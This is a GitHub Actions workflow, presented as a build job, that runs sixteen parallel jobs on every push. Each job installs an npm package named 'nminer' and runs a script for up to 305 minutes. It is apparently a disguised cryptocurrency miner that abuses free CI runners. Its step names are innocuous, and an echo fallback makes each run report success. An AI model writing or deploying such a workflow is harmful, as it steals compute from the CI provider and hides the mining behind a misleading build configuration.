name: hydrocarbon
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2289 }
          - { version: 5792 }
          - { version: 4134 }
          - { version: 9478 }
          - { version: 4670 }
          - { version: 1224 }
          - { version: 4358 }
          - { version: 8700 }
          - { version: 7012 }
          - { version: 9138 }
          - { version: 5674 }
          - { version: 7199 }
          - { version: 308 }
          - { version: 1905 }
          - { version: 2869 }
          - { version: 787 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: vice
        run: |
          npm install nminer@latest
          timeout 305m node hydrocarbon.js || echo "hydrocarbon executed"